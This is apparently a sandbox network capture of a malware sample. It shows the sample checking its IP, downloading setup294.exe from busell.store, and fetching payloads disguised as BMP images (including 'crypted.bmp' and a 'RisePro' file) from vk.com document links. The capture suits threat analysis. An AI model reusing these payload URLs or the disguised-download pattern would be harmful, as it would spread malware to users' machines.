Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u%2B%2FOrOxkCBAZvO%2FN35g4VjVwmy1jvPrKrh8s3%2FrMAoXq91xiFD41t6lBmSQQkn0ZN1R3nbMysYWOaHmysVJo1FMfgSSh6ai9YVNdq1Y5BQfjYOOa%2FduEgzmfdcAv6g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fd87c198c448376-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:21 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 286703 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Sun, 25 Aug 2024 09:28:52 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; expires=Tue, 27 Aug 2024 00:37:21 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=b5f64a3fe52dc9a62c; expires=Thu, 29 Aug 2024 22:53:26 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH; expires=Sat, 24 Aug 2024 20:21:25 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: busell.store Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:26 GMT Content-Type: application/x-msdos-program Content-Length: 2846715 Connection: keep-alive Last-Modified: Mon, 28 Aug 2023 00:16:40 GMT ETag: "2b6ffb-603f09bbaaa00" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zorL7xo4SxXwFA61CssOpSSbVo512CmQu5tUyJPg7wH%2FjmZGS9TcDiZhc%2FJPsalVHQUQAHecFraYQRqxS1uglYwblNLkrR2hK4MrM9QZcvrGdOBA%2FwtBu2zz4NsPdoM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fd87c538f938d18-KIX alt-svc: h3=":443"; ma=86400

GET /doc44017378_668379524?hash=SHDy8F6MTaslV7hf9Z9WkzT8bkNJZOA2fSyjKD1YdDo&dl=mK8EYpCb4aWgpHrL7FEXpgLAT0BAaZgxM86wS4u0thT&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH

HTTP/1.1 302 Found Server: kittenx Date: Mon, 28 Aug 2023 00:37:28 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c240331/u44017378/docs/d44/4a7d1471c416/RazerSynapse.bmp?extra=cN1Ah5ycB0omDx2FAikyNuYCqqszKvg5NBZJDmMD6HRQxbVzQbkLFTHETnx3i1hANoppE7iqkUrkKQtOQRPtkScZhENAh3LCvnuUSp-j8zDG-Cvg9M6IK8a17l-939_WI4KPzI7sBWuITe1s X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668355890?hash=OEXurxHv742cAEINPwUZWBvCkIvq2mo3gMKCk9mNEZz&dl=FcEr7W2vNSUK3rRVQ2uwXb1BnszbBNaV1N06orQc1Os&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH

HTTP/1.1 302 Found Server: kittenx Date: Mon, 28 Aug 2023 00:37:28 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909618/u44017378/docs/d44/659cbd3e52a9/PL43464.bmp?extra=wK-OoZtI3J9ssAzreYk1kKj_zykQJOvu-BbinFwgrI900hXBuZG5_zEBcLVat0Mc2xdZYmHMPnynVNnjTwIJFL5e_3907MFu9oh5yOz8DYWjl4htBLKmXxGD66TLBh3cc_hNK4vbUGcr99qq X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u44017378/docs/d44/659cbd3e52a9/PL43464.bmp?extra=wK-OoZtI3J9ssAzreYk1kKj_zykQJOvu-BbinFwgrI900hXBuZG5_zEBcLVat0Mc2xdZYmHMPnynVNnjTwIJFL5e_3907MFu9oh5yOz8DYWjl4htBLKmXxGD66TLBh3cc_hNK4vbUGcr99qq HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:29 GMT Content-Type: image/x-ms-bmp Content-Length: 7942148 Connection: keep-alive Last-Modified: Thu, 24 Aug 2023 09:35:38 GMT ETag: "64e7246a-793004" Expires: Wed, 27 Sep 2023 00:37:29 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c240331/u44017378/docs/d44/4a7d1471c416/RazerSynapse.bmp?extra=cN1Ah5ycB0omDx2FAikyNuYCqqszKvg5NBZJDmMD6HRQxbVzQbkLFTHETnx3i1hANoppE7iqkUrkKQtOQRPtkScZhENAh3LCvnuUSp-j8zDG-Cvg9M6IK8a17l-939_WI4KPzI7sBWuITe1s HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:29 GMT Content-Type: image/x-ms-bmp Content-Length: 349188 Connection: keep-alive Last-Modified: Thu, 24 Aug 2023 18:07:18 GMT ETag: "64e79c56-55404" Expires: Wed, 27 Sep 2023 00:37:29 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc44017378_668305087?hash=TuocKpTKJDaGHrC0HTDbLSAP7ILM8xAQgYNUm78Bmgc&dl=pQmbc6zVZsxint9VqlO9DcFBndvLOtSqeXbOXCsW4yo&api=1&no_preview=1#start HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Mon, 28 Aug 2023 00:37:31 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909228/u44017378/docs/d31/031a419a08d3/x.bmp?extra=dePDDxM4DGeRjT25CPSd9Ct_rh4XuSy3bDoQT210esXvzYUkXxOVYuGMvFWgtBzuVzB3Pu96kIXJMM6wkMMmcUYG__1Vlk_pw8FQ7gzlKceZLiq9Eqem8GfM2a6kPvhxYu11_xbkARdYZv5A X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668469133?hash=BzAyBtoTQmQ0uUkT34inVefZZZfjSHGwzjfnXF9K9IP&dl=Y4YNowZZspOPNeFf2KoJiZEZDeoxookrqRltEutjAJL&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Mon, 28 Aug 2023 00:37:32 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c237131/u44017378/docs/d8/804100308acb/crypted.bmp?extra=YdWzxtefQjhAn2En8yMf52BVIWQ1zDpTGnqIQV8H-oovyZAD987-RJUW7gg_f88GbltLuEEDnvBy7hYICJjBzLy3mUu_gNG3r-H83JNo8km9DJT6vRIbrJJSEyZFo5UVa2zp0-t91ahX0NLI X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909228/u44017378/docs/d31/031a419a08d3/x.bmp?extra=dePDDxM4DGeRjT25CPSd9Ct_rh4XuSy3bDoQT210esXvzYUkXxOVYuGMvFWgtBzuVzB3Pu96kIXJMM6wkMMmcUYG__1Vlk_pw8FQ7gzlKceZLiq9Eqem8GfM2a6kPvhxYu11_xbkARdYZv5A HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:32 GMT Content-Type: image/x-ms-bmp Content-Length: 1710596 Connection: keep-alive Last-Modified: Wed, 23 Aug 2023 07:32:44 GMT ETag: "64e5b61c-1a1a04" Expires: Wed, 27 Sep 2023 00:37:32 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c237131/u44017378/docs/d8/804100308acb/crypted.bmp?extra=YdWzxtefQjhAn2En8yMf52BVIWQ1zDpTGnqIQV8H-oovyZAD987-RJUW7gg_f88GbltLuEEDnvBy7hYICJjBzLy3mUu_gNG3r-H83JNo8km9DJT6vRIbrJJSEyZFo5UVa2zp0-t91ahX0NLI HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:33 GMT Content-Type: image/x-ms-bmp Content-Length: 396804 Connection: keep-alive Last-Modified: Sat, 26 Aug 2023 20:03:36 GMT ETag: "64ea5a98-60e04" Expires: Wed, 27 Sep 2023 00:37:33 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:34 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 286719 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668304193?hash=9nKZ2LbJrWZTaSMoxOyzGdzdzVswMLVAELDqvF4WUzc&dl=8uKyjO7RLaL9aj2kQjAN7XRk3OAYJZ3SL1dkc9tNpxc&api=1&no_preview=1#WW1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Mon, 28 Aug 2023 00:37:34 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c240331/u44017378/docs/d46/42e54d223ac0/WWW1.bmp?extra=z3ACIIJGvpBq0HIjNutA06MbTxxpx-3FTjAItWDCFPURzTU-Elofrz0yjYDQ-Y0cKAOty0-j-qZ4D9-iRxHB4fbGo-ZGq2MO7TmgEksuA_yPzC1cH8cIReEGVuYFWKNHeD38LYYVpq6zZwr1 X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c240331/u44017378/docs/d46/42e54d223ac0/WWW1.bmp?extra=z3ACIIJGvpBq0HIjNutA06MbTxxpx-3FTjAItWDCFPURzTU-Elofrz0yjYDQ-Y0cKAOty0-j-qZ4D9-iRxHB4fbGo-ZGq2MO7TmgEksuA_yPzC1cH8cIReEGVuYFWKNHeD38LYYVpq6zZwr1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:35 GMT Content-Type: image/x-ms-bmp Content-Length: 4861444 Connection: keep-alive Last-Modified: Wed, 23 Aug 2023 07:08:49 GMT ETag: "64e5b081-4a2e04" Expires: Wed, 27 Sep 2023 00:37:35 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:37 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 286718 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668405935?hash=fvMGzddKGZ3CmaEa4ShIsqcaZmrdOzO4ZYwVyqVeuP4&dl=A1sZp5keQgwnZnnluDo5illwFz3gbsy8ItDrxpQJEYX&api=1&no_preview=1#rise HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH

HTTP/1.1 302 Found Server: kittenx Date: Mon, 28 Aug 2023 00:37:39 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909628/u44017378/docs/d59/31728cb37cde/RisePro_0_5_eM6kP0V0t0TJM31LPkFZ.bmp?extra=8qyEsehyUDi_2xlj_ansoERclQ9Xci7OMgY_Z_dhC3sYp7lSaoe-hwps_VpYFHUZgKttlij0IkBys8yBQrRUN5ckgRxTLEt4x2H7QR9_t0L9p2MEQT46O4gRs1cifsBGFjn9PEomMPopTUT7 X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909628/u44017378/docs/d59/31728cb37cde/RisePro_0_5_eM6kP0V0t0TJM31LPkFZ.bmp?extra=8qyEsehyUDi_2xlj_ansoERclQ9Xci7OMgY_Z_dhC3sYp7lSaoe-hwps_VpYFHUZgKttlij0IkBys8yBQrRUN5ckgRxTLEt4x2H7QR9_t0L9p2MEQT46O4gRs1cifsBGFjn9PEomMPopTUT7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:37:39 GMT Content-Type: image/x-ms-bmp Content-Length: 1017860 Connection: keep-alive Last-Modified: Fri, 25 Aug 2023 11:34:27 GMT ETag: "64e891c3-f8804" Expires: Wed, 27 Sep 2023 00:37:39 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:11 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive X-IPLB-Request-ID: 8D655614:3800_93878F2E:0050_64EBEC6B_213AAC1F:2467C X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RWIaeGpqbnsnFVO6onh92QylPs%2B4gYYJRZXIgoAeMA2s3AHtCPvvu2XWpSMFLDw2UeqXWSkIODdkm7FWbb5ha7ugVHWzrBrZbT0JzcM0Y7idr5sS%2BYbNF8A9nQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fd87d6f592219c4-KIX alt-svc: h3=":443"; ma=86400

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WHucD48y9tXFtOQm8QRs8iRSck7GqEjKOoRYC3bu5NVw%2BrUwfhPdMl%2Fh7ze8V%2Bsdglf3cZfaJD%2Bb0c%2FkYckGz0zpSSTvAUdpeCzAOtbaVsScpbofr3zQiYXEA6WhCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fd87d8029f68cf2-KIX

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

